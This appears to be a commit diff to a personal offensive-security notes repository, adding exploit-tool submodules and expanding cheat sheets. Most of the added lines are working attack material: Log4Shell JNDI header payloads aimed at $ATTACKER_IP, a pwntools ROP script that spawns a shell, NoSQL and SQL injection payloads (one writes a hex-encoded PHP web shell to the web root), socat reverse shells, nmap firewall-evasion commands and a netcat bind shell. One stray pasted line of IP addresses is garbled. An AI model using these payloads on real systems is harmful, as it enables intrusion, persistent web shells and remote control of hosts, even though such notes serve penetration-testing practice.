bump

.gitmodules

@@ -109,3 +109,27 @@
 [submodule "exploit/windows/PrintNightmare"]
 	path = exploit/windows/PrintNightmare
 	url = https://github.com/ly4k/PrintNightmare.git
+[submodule "enumeration/containers/deepce"]
+	path = enumeration/containers/deepce
+	url = https://github.com/stealthcopter/deepce.git
+[submodule "enumeration/Typo3Scan"]
+	path = enumeration/Typo3Scan
+	url = https://github.com/whoot/Typo3Scan.git
+[submodule "exploit/web/php/phpggc"]
+	path = exploit/web/php/phpggc
+	url = https://github.com/ambionics/phpggc.git
+[submodule "post_exploitation/priv_esc/sucrack"]
+	path = post_exploitation/priv_esc/sucrack
+	url = https://github.com/hemp3l/sucrack.git
+[submodule "exploit/java/JNDI-Exploit-Kit"]
+	path = exploit/java/JNDI-Exploit-Kit
+	url = https://github.com/pimps/JNDI-Exploit-Kit.git
+[submodule "exploit/binaries/buffer_overflow/ropstar"]
+	path = exploit/binaries/buffer_overflow/ropstar
+	url = https://github.com/xct/ropstar.git
+[submodule "exploit/java/log4j-scan"]
+	path = exploit/java/log4j-scan
+	url = https://github.com/fullhunt/log4j-scan.git
+[submodule "misc/static-binaries"]
+	path = misc/static-binaries
+	url = https://github.com/andrew-d/static-binaries.git

enumeration/Typo3Scan

@@ -0,0 +1 @@
+Subproject commit 9ee2b90114121ecd95ffc943a81aa1d01c054a2f

enumeration/containers/deepce

@@ -0,0 +1 @@
+Subproject commit 060506279e6a0a5127da7245e9dac58c76d64fb4

exploit/binaries/buffer_overflow/ropping.md

@@ -0,0 +1,28 @@
+# ROP Chaining
+
+## Usage
+
+* Find cyclic buffer size
+* Find gadgets via `ropper` or even better `ropstar`
+
+## Example
+```python
+from pwn import *
+
+s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
+p = s.process(['sudo', '<process>'])
+
+offset=<found_offset_len>
+
+# take the ropchain from ropstar
+payload = cyclic(offset)
+payload += p64(0x4711)
+payload += p64(0x235)
+payload += p64(0x007)
+
+print(p.recv())
+p.sendline(payload)
+print(p.recv())
+p.sendline("/bin/sh")
+p.interactive(prompt='')
+```

exploit/binaries/buffer_overflow/ropstar

@@ -0,0 +1 @@
+Subproject commit f025a2e4923b501d68d24fa44b22869a84e29e3e

exploit/buffer_overflow/peda

@@ -1 +0,0 @@
-Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43

exploit/java/JNDI-Exploit-Kit

@@ -0,0 +1 @@
+Subproject commit e464facbc761a1b3530181a6f37c95925c197551

exploit/java/log4j-scan

@@ -0,0 +1 @@
+Subproject commit ceae24f4ebdbbdfc1dc350bab4d512d9dcf8027c

exploit/java/log4shell.md

@@ -25,6 +25,8 @@ curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449
 * Use HTTP header field as storage for payload or any other possible input field
 ```HTTP
 X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
+Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo}
+X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
 ```
 
 ## Usage
@@ -87,4 +89,5 @@ ${${::-j}ndi:rmi://attackerendpoint.com/}
 * Add the following line to `solr.in.sh`
 ```toml
 SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
+10.10.90.21210.10.90.212
 ```

exploit/sqli/no_sqli.md

@@ -32,3 +32,7 @@ $regex
 ```sh
 username=admin&password[$ne]=admin
 ```
+* JSON
+```json
+{"username":"user","password":{"$ne":""} }
+```

exploit/sqli/sqli.md

@@ -121,6 +121,12 @@ id=(SELECT banner FROM v$version) # oracle
 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
 ```
 
+## Insert
+* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
+```sql
+<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
+```
+
 ### Examples
 * sqli inside HTTP request to an API. Five values inside select have been discovered before
 ```HTTP

exploit/web/http_header_injection.md

@@ -0,0 +1,8 @@
+# HTTP Header Injection & Cache Poisoning
+
+## References
+
+* [Portswigger]https://portswigger.net/web-security/host-header
+* [Spring project](https://github.com/spring-projects/spring-security/issues/4310)
+* [Skeletonscribe.com](https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html)
+

exploit/web/jwt/jwt_tool

@@ -1 +1 @@
-Subproject commit eb411ea89b11df4485733201860619883a4f05e6
+Subproject commit aa496cf0e2f832318afd043e4baac6cef0502689

exploit/web/php/phpggc

@@ -0,0 +1 @@
+Subproject commit 9121c3f2c95b9b7726f663a1f2ce6526be69c713

misc/level3_hypervisor/docker_sec/docker.md

@@ -63,7 +63,6 @@ or
 docker run -v /:/host --rm -it <imageID> chroot /host/ bash
 ```
 
-
 ## Shared Namespaces
 * Namespaces
 * Cgroups
@@ -106,6 +105,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 mkdir /mnt/hostdev
 mount /dev/<hostVda> /mnt/hostdev
 ```
+* Check `/dev` as well !!! and mount device
 
 ## Creating a Container from inside another container
 

post_exploitation/priv_esc/sucrack

@@ -0,0 +1 @@
+Subproject commit c738b9a6d78b6aa517767d7621480a3f3dfb4dd6

reverse_shells/docs/socat.md

@@ -6,14 +6,19 @@
 ```socat TCP-L:<PORT> file:`tty`,raw,echo=0```
 
 ### windows target
-```socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes```
+```sh
+socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
+```
 
 ### linux target
-```socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"```
+```sh
+socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
+```
 
 ## Bind Shell
 ### generic connect
 ```socat TCP:<TARGET-IP>:<TARGET-PORT> -```
+
 ### windows target listener
 ```socat TCP-L:<PORT> EXEC:powershell.exe,pipes```
 

reverse_shells/firewalls.md

@@ -1,11 +1,99 @@
 # Firewall Handling
 
-# Windows
+## Types
+
+* Packet filtering
+* Circuit level gateway
+* Stateful inspection
+* Proxy
+* Next generation firewall
+* Cloud firewall and FWaaS
+
+## Rules
+
+### Windows
 ```sh
 netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
 ```
 
-# CentOS
+### CentOS
 ```sh
 firewall-cmd --zone=public --add-port=57869/tcp
 ```
+
+## Circumvention
+
+* IP/MAC/Port spoofing
+* Fragmentation, MTU, data length
+* Header modification
+
+### nmap
+
+#### Spoofing
+* __Decoy__ `-D` , mixin real IP address with random adresses. Every port will be requested by any of these addresses.
+```sh
+sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
+sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
+```
+* __Proxy__
+```sh
+sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
+```
+* __Spoofed MAC__
+```sh
+sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
+```
+* __Spoofed IP__
+```sh
+sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
+```
+* __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44
+```sh
+sudo nmap -F --source-port 443 $TARGET_IP
+```
+* __Fragmentation__, eth header + 20 bytes header size +  bytes fragments via `-f`, or 16 bytes via `-ff`
+```sh
+sudo nmap -Pn -F -f $TARGET_IP
+```
+* __MTU__, works like fragmentation, `-f` == `--mtu 8`
+
+```sh
+sudo nmap -Pn -F --mtu 8 
+```
+* __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes
+```sh
+sudo nmap -Pn -F --data-length 64 $TARGET_IP
+```
+
+#### Header Fields
+
+* __TTL__
+```sh
+sudo nmap -Pn -F --ttl 64 $TARGET_IP
+```
+* __IP OPTIONS__, `--ip-options` recordsas hex String
+
+    * Route, `R`
+    * Timestamp, `T`
+    * Route + Timestamp, `U`
+    * Loose source routing, `L $IP $IP $IP`
+    * Strict source routing, `S $IP $IP $IP`
+
+* __Checksum__, craft bad checksum via `--badsum` to check errors
+```sh
+sudo nmap -Pn -F --badsum $TARGET_IP
+```
+
+#### After the FW
+* __Hopping__, listen via netcat to catch that port
+* __Tunneling__, relay open after passsing the firewall to connect to the closed port
+```sh
+nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
+```
+* __Non standard ports__, open bin shell via 
+```sh
+nc -lvnp 8888 -e /bin/bash
+```
+and connect
+
+